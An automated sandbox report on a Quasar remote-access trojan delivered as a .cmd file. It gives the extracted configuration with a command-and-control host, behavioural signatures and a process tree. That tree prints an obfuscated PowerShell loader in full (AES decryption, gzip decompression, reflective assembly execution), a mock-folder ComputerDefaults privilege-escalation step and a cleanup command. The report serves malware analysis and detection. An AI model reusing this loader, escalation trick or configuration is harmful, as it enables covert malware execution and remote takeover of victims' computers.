Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 13:59
Static task
static1
Behavioral task
behavioral1
Sample
ea0dbb78a37927ed07f0c30ad9e814c2f71a16e9a6e8356726f03637bb48a848.cmd
Resource
win7-20240708-en
General
-
Target
ea0dbb78a37927ed07f0c30ad9e814c2f71a16e9a6e8356726f03637bb48a848.cmd
-
Size
2.0MB
-
MD5
a83ac24f3b7291351f52ea99c33b43ca
-
SHA1
4819de0035af164608341bdab34fe277cc517536
-
SHA256
ea0dbb78a37927ed07f0c30ad9e814c2f71a16e9a6e8356726f03637bb48a848
-
SHA512
af2301759d1037f609b876090eb188f0747ecf7c4d3e5ebd23395389dd23c1398cd123a902d015d47018f1ef686b44908cca3280d86ccc4a1993b7c0388b9551
-
SSDEEP
24576:r7ftZVfP4Eg45n691f/qE71faFpIx6SXP1nOEunZ8/O2x01+dHepYAk0NkVG7/dp:rdLA9Fi7IxDRK294y7D/h2R
Malware Config
Extracted
quasar
1.4.1
Office04
walkout.ddnsgeek.com:8080
27391f85-a482-471a-b2cd-1f8ab5bde32e
-
encryption_key
6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/2100-44-0x0000012B7A360000-0x0000012B7A684000-memory.dmp family_quasar -
Blocklisted process makes network request 4 IoCs
flow pid Process 16 2052 powershell.exe 25 2100 powershell.exe 27 2100 powershell.exe 29 2100 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2052 powershell.exe 2100 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3820 ComputerDefaults.exe -
Loads dropped DLL 1 IoCs
pid Process 3820 ComputerDefaults.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2052 powershell.exe 2052 powershell.exe 2100 powershell.exe 2100 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2052 powershell.exe Token: SeDebugPrivilege 2100 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2100 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 3004 wrote to memory of 228 3004 cmd.exe 84 PID 3004 wrote to memory of 228 3004 cmd.exe 84 PID 3004 wrote to memory of 2052 3004 cmd.exe 85 PID 3004 wrote to memory of 2052 3004 cmd.exe 85 PID 2052 wrote to memory of 4756 2052 powershell.exe 96 PID 2052 wrote to memory of 4756 2052 powershell.exe 96 PID 2052 wrote to memory of 4452 2052 powershell.exe 98 PID 2052 wrote to memory of 4452 2052 powershell.exe 98 PID 4452 wrote to memory of 3820 4452 cmd.exe 100 PID 4452 wrote to memory of 3820 4452 cmd.exe 100 PID 4756 wrote to memory of 4404 4756 cmd.exe 105 PID 4756 wrote to memory of 4404 4756 cmd.exe 105 PID 4756 wrote to memory of 2100 4756 cmd.exe 106 PID 4756 wrote to memory of 2100 4756 cmd.exe 106 PID 2052 wrote to memory of 2428 2052 powershell.exe 113 PID 2052 wrote to memory of 2428 2052 powershell.exe 113
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ea0dbb78a37927ed07f0c30ad9e814c2f71a16e9a6e8356726f03637bb48a848.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('byOwlJEq9UaHWPvf8iRQsbA+J/FwJgSUsZSwL1NNg8o='); $aes_var.IV=[System.Convert]::FromBase64String('jlnOHC6q2ppF5ItJ8IOVtA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Yytzc=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$fsmDR=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$DKcCE=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Yytzc, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $DKcCE.CopyTo($fsmDR); $DKcCE.Dispose(); $Yytzc.Dispose(); $fsmDR.Dispose(); $fsmDR.ToArray();}function execute_function($param_var,$param2_var){ IEX '$DfiAV=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$sYTdY=$DfiAV.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$sYTdY.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$hxgif = 'C:\Users\Admin\AppData\Local\Temp\ea0dbb78a37927ed07f0c30ad9e814c2f71a16e9a6e8356726f03637bb48a848.cmd';$host.UI.RawUI.WindowTitle = $hxgif;$qrlCl=[System.IO.File]::ReadAllText($hxgif).Split([Environment]::NewLine);foreach ($SwqTj in $qrlCl) { if ($SwqTj.StartsWith('bRlIVVrKLnBjMLQIZMQv')) { $silSH=$SwqTj.Substring(20); break; }}$payloads_var=[string[]]$silSH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "2⤵PID:228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\test.cmd" "3⤵
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QbyHvTiQtx89YnRta8IEyPqtyneJjEN3sJ2ZhbHVoLs='); $aes_var.IV=[System.Convert]::FromBase64String('OxX1X2lNZIgN15fz3vySVw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$xCITj=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$tIajX=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$FlQAx=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($xCITj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $FlQAx.CopyTo($tIajX); $FlQAx.Dispose(); $xCITj.Dispose(); $tIajX.Dispose(); $tIajX.ToArray();}function execute_function($param_var,$param2_var){ IEX '$GhsFa=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$kwssa=$GhsFa.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$kwssa.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$FFjjS = 'C:\Users\Admin\AppData\Roaming\temp\test.cmd';$host.UI.RawUI.WindowTitle = $FFjjS;$kRRdo=[System.IO.File]::ReadAllText($FFjjS).Split([Environment]::NewLine);foreach ($smNgX in $kRRdo) { if ($smNgX.StartsWith('luZsHxYvUgyKYktkRiik')) { $gnoFR=$smNgX.Substring(20); break; }}$payloads_var=[string[]]$gnoFR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "4⤵PID:4404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q3⤵PID:2428
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.6MB
MD5846debdd4c489b9cdf58cf035011385b
SHA1edd9486a627bc3f35772e2e79eb7a3aa021569cd
SHA256113c957ba369a4bea2068a9d5596f644e365cb81c19a28cce8ca1382ccc08e2d
SHA512c46b02e2a54314bca1695e03196a7041aebe5bede3e857f62e0e634cc2c4ea9ed95d569a73c2b6c935afab5a961a0253ce40988e3c65d9ff33bbaa34a2376f51
-
Filesize
80KB
MD5d25a9e160e3b74ef2242023726f15416
SHA127a9bb9d7628d442f9b5cf47711c906e3315755b
SHA2567b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c
SHA512bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910
-
Filesize
308KB
MD5130553ce2e4112cf59f9cfecfb81fe75
SHA10ec3164f9d3ee5baab8e3862e1b499941a072e5c
SHA2561abd799ba4bfee25737243568ae048c0b50f1892b41d7e0f7b3c3af8410babde
SHA51250b78c5974147aa1c7e9445bc23490e01f1fc9cf7968040ae27216c34b54c09246409bbcf1a1e5e3f25efcb87906a27386175ea6f911a8e87adbb6d3e2781627